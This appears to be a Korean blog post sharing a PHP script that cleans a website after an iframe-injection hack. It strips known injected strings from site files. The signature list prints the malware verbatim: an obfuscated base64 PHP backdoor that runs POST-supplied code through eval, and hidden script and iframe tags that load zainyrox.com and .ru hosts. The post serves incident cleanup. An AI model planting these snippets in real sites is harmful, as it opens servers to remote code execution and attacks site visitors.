iframe hacking 당한 후에 사용한 치료용 스크립트
로빈아빠


스크립트를 실행한 디렉토리부터 그 아래 모든 하위 디렉토리를 뒤져서, 감염된 파일(.htm, .html, .php, .inc, .js)에서 삽입된 코드를 지우고 파일을 덮어쓰는 방식으로 되어 있다.


<?php
// usage: cd to the root of the infected directory tree, then run: php -f kickHack.php



// Exact byte strings that the compromise inserted into site files. healFile()
// deletes every occurrence with str_replace(), so only byte-for-byte copies are
// removed; a variant that differs by a single character is left in place.
$hackArr = array(
 // 1) PHP snippet. Its base64 body decodes to an output-buffer callback (vr1)
 //    that inserts the zainyrox.com script tag into generated pages, and it ends
 //    with eval(base64_decode($_POST['e'])), i.e. a backdoor that runs PHP sent
 //    in a POST field. A host where this entry matched has been open to remote
 //    code execution; deleting the snippet does not undo what was run through it.
 '<?php eval(base64_decode(\'aWYoIWZ1bmN0aW9uX2V4aXN0cygndnIxJykpe2Z1bmN0aW9uIHZyMSgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzcGhhVzU1Y205NExtTnZiUzlmY0hKcGRtRjBaUzlvWldGa1pYSXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gdnIxMigkYSwkYiwkYywkZCl7Z2xvYmFsJHZyMTE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHZyMTEpKWNhbGxfdXNlcl9mdW5jKCR2cjExLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd2cjEnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd2cjEnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdnIxbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndnIxMicpKSE9J3ZyMTInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==\')); ?>',
 // 2) JavaScript document.write() form of the same zainyrox.com script include.
 'document.write(\'<script src=http://zainyrox.com/_private/header.php ><\/script>\');',
 // 3) Plain HTML script tag loading the same URL.
 '<script src=http://zainyrox.com/_private/header.php ></script>',
 // 4) iframe whose onload handler sets its src to superkahn.ru:8080 and its
 //    height and width to 0.
 '<iframe frameborder="0" onload="if (!this.src){ this.src=\'http://superkahn.ru:8080/index.php\'; this.height=\'0\'; this.width=\'0\';}" >fspcmsjgtslisadhstuqkmwehtuenjt</iframe>',
 // 5) div hidden with display:none that wraps an iframe to icq-tel.ru:8080.
 '<div style="display:none">kagigwwmmrjjjyrfqapcnzywvzeuijp<iframe width=127 height=336 src="http://icq-tel.ru:8080/index.php" ></iframe></div>'
);



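// Scan root: the directory the script was launched from. getcwd() is used
// instead of $_SERVER['PWD'] because PWD is an environment variable that is
// absent under some launchers (cron, Windows), which would leave the root empty.
$startDIR = getcwd();
if ($startDIR === false) {
    echo "cannot determine the current working directory\n";
    exit(1);
}

// Absolute path of this script, used by healFile() to skip itself. Two of the
// signatures in $hackArr appear verbatim in this file, so failing to skip it
// would blank them out of the signature list. PWD.'/'.PHP_SELF only matched
// when the script was started by its bare file name from the scan root.
$self = __FILE__;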


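/**
 * Recursively remove the known injected snippets from web files under $dir.
 *
 * Reads the globals $hackArr (exact strings to delete) and $self (path of this
 * script, which is never rewritten). Files ending in .htm, .html, .php, .inc or
 * .js (any letter case) are read, every occurrence of a signature is deleted,
 * and the file is rewritten in place only when something matched. No copy of
 * the infected original is kept, so take one first if the files are needed as
 * evidence. One line "<dir> <n> found" is printed for each directory in which
 * n files were cleaned.
 *
 * Symbolic links are skipped: following them could walk outside the scan root
 * or loop forever, and on a compromised tree a planted link would make this
 * script rewrite files elsewhere on the host.
 *
 * @param string $dir Directory to scan, without a trailing slash.
 * @return void
 */
function healFile($dir){
    global $hackArr, $self;

    $entries = scandir($dir);
    if ($entries === false) {
        // Unreadable directory: report it instead of silently treating it as clean.
        echo $dir." unreadable, skipped\n";
        return;
    }

    // Resolve once so "./kickHack.php" style paths still compare equal below.
    $selfReal = realpath((string)$self);
    $matchcnt = 0;

    // Reverse order keeps the traversal order of the original array_pop() loop.
    foreach (array_reverse($entries) as $popname) {
        if ($popname === '.' || $popname === '..') {
            continue;
        }
        $theFile = $dir.'/'.$popname;

        if (is_link($theFile)) {
            continue;
        }
        if (is_dir($theFile)) {
            healFile($theFile);
            continue;
        }
        if ($theFile === $self || ($selfReal !== false && realpath($theFile) === $selfReal)) {
            continue;
        }

        // Lower-casing also catches INDEX.PHP / Page.HTML, which the
        // case-sensitive suffix test let through untouched.
        $ext = strtolower(pathinfo($popname, PATHINFO_EXTENSION));
        if (!in_array($ext, array('htm', 'html', 'php', 'inc', 'js'), true)) {
            continue;
        }

        $cont = file_get_contents($theFile);
        if ($cont === false) {
            echo $theFile." unreadable, skipped\n";
            continue;
        }

        $res = str_replace($hackArr, '', $cont, $cnt);
        if ($cnt > 0) {
            // Count the file as cleaned only when the write really succeeded.
            if (file_put_contents($theFile, $res) === false) {
                echo $theFile." still infected: write failed\n";
                continue;
            }
            $matchcnt++;
        }
    }

    if ($matchcnt > 0) {
        echo $dir.' '.$matchcnt." found\n";
    }
}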
// Entry point: start the recursive clean-up at $startDIR, the directory the
// script was launched from.
healFile($startDIR);


?>
